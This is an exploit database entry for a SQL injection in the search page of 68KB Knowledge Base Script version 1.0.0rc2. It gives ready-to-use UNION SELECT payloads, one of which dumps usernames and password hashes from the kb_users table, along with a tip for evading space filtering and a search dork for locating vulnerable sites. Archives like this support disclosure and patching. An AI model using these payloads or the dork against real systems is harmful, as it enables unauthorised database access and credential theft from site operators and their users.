EXPLOITS

68KB Knowledge Base Script 1.0.0rc2 - Search SQL Injection

Author: Jelmer de Hen
type: webapps
platform: php
port: 
date_added: 2010-03-27  
date_updated:   
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.com68kb-v1.0.0rc2.zip  

raw file: 11925.txt  

Exploit Title: 68kb SQLI
Date: 2010-03-28
Author: Jelmer de Hen
Software Link: http://68kb.googlecode.com/files/68kb-v1.0.0rc2.zip
Version: v1.0.0rc2

Go to /search
and search for: %')/**/UNION/**/ALL/**/SELECT/**/1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15#
Don't use spaces in the injection because they change the sql query in a way which makes the injection nearly impossible; instead use /**/.
Here is an example how to select usernames and password if the default prefix of kb_ is used during the installation:
search for: %')/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/kb_users#

Dork: "Powered by 68kb"

-Jelmer de Hen